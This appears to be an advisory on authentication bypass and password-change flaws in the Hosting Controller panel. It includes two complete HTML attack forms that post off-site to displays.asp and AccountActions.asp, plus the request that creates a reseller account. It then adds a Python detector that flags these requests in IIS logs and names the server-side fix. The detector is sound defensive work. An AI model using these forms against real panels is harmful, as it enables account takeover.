1- [Remote Attacker] can log in to the Hosting Controller panel. He can also change all other users' passwords:
1.1- http://[HC URL]/hosting/addreseller.asp?reseller=[USERNAME] -> for example, [USERNAME] = resadmin
1.2- Now, to log in without changing the password, the attacker must run "ChangeDisplay.htm" and then redirect to "main.asp"
~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
_action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1'
frmDisplay.action = window.document.all.URL.value + _action
return true;
}
</script>
URL: <input type="text" name="URL" />
<form name="frmDisplay" action="" method="post" onsubmit="return check()">
<input type="hidden" name="TemplateSkin" value="PanelXP/Blue" />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.3- The attacker can also change a user's password without knowing the current password, using "ChangePass.htm"
~~~~~~~~~~~~~~~~1.3.1 ChangePass.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
_action = '/Accounts/AccountActions.asp?ActionType=UpdateUser'
frmChangePass.action = window.document.all.URL.value + _action
return true;
}
</script>
URL: <input type="text" name="URL" /><br />
<form name="frmChangePass" action="" method="post" onsubmit="return check()">
UserName: <input type="text" name="UserName" value="[USERNAME]" /> <br />
FullName: <input type="text" name="FullName" value="[USERNAME]" /> <br />
Description: <input type="text" name="Description" value="Something" /> <br />
Password: <input type="text" name="Pass1" value="" /> <br />
Confirm Password: <input type="text" name="ConfPass" value="" /> <br />
<input type="hidden" name="DefaultDiscount" value="0" />
<input type="hidden" name="CreditLimit" value="0" />
<input type="hidden" name="ActionType" value="AddUser" />
<input type="hidden" name="PassCheck" value="TRUE" />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
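Both HTML pages above work the same way: a form hosted outside the panel posts directly to displays.asp or AccountActions.asp, and the server acts on it without a verified session or the current password. From the defender's side that pattern is visible in the web server log as a POST to one of the endpoints named in this advisory whose Referer is missing or does not belong to the panel host. The following Python script (an added example, not code from the advisory or from Hosting Controller) parses IIS W3C extended log lines and flags such requests. The host name panel.example.test, the field list and the log rows are constructed for the example; the URI paths and query strings are the ones given above.

```python
"""Flag cross-site requests to the Hosting Controller endpoints named in the advisory,
using IIS W3C extended log lines. Added example; the log sample is constructed."""
from urllib.parse import urlsplit

# Endpoints from the advisory, keyed by lower-cased cs-uri-stem.
SENSITIVE = {
    "/adminsettings/displays.asp": "skin change used to obtain a session",
    "/accounts/accountactions.asp": "user update / password change",
    "/hosting/addreseller.asp": "reseller account creation",
}

# Constructed IIS 6 W3C sample (not a real capture): one legitimate session from
# 10.0.0.5, then the advisory's sequence from 203.0.113.9.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2024-01-05 10:00:01 10.0.0.5 GET /hosting/login.asp - 200 -
2024-01-05 10:00:07 10.0.0.5 POST /hosting/login.asp - 302 http://panel.example.test/hosting/login.asp
2024-01-05 10:00:20 10.0.0.5 POST /AdminSettings/displays.asp DecideAction=1&ChangeSkin=1 302 http://panel.example.test/AdminSettings/displays.asp
2024-01-05 11:30:02 203.0.113.9 GET /hosting/addreseller.asp reseller=resadmin 200 -
2024-01-05 11:30:15 203.0.113.9 POST /AdminSettings/displays.asp DecideAction=1&ChangeSkin=1 302 file:///C:/tmp/ChangeDisplay.htm
2024-01-05 11:30:40 203.0.113.9 POST /Accounts/AccountActions.asp ActionType=UpdateUser 302 -
"""


def parse_w3c(text):
    """Yield one dict per data row, using the most recent #Fields header as keys."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # header missing or malformed row: skip rather than guess
        yield dict(zip(fields, values))


def is_cross_site(referer, panel_host):
    """True when the request did not originate from a page on the panel itself."""
    if referer == "-":
        return True
    parts = urlsplit(referer)
    # file://, data: and foreign hosts all count as off-panel origins.
    return parts.scheme not in ("http", "https") or parts.hostname != panel_host


def find_alerts(text, panel_host):
    """Return (client ip, uri stem, query, reason) for each suspicious request."""
    alerts = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        if stem not in SENSITIVE:
            continue
        if is_cross_site(rec["cs(Referer)"], panel_host):
            alerts.append((rec["c-ip"], rec["cs-uri-stem"],
                           rec["cs-uri-query"], SENSITIVE[stem]))
    return alerts


if __name__ == "__main__":
    for ip, stem, query, reason in find_alerts(SAMPLE_LOG, "panel.example.test"):
        print(f"{ip} {stem}?{query}  <- {reason}")
```

The Referer check is a heuristic: a client can omit or forge the header, so it catches the advisory's HTML pages as written but is not a substitute for the server-side fix, which is to reject these requests unless they carry an authenticated session and, for password changes, the current password. Pairing the alert with the absence of a prior successful login from the same client, as in the sample, raises confidence further.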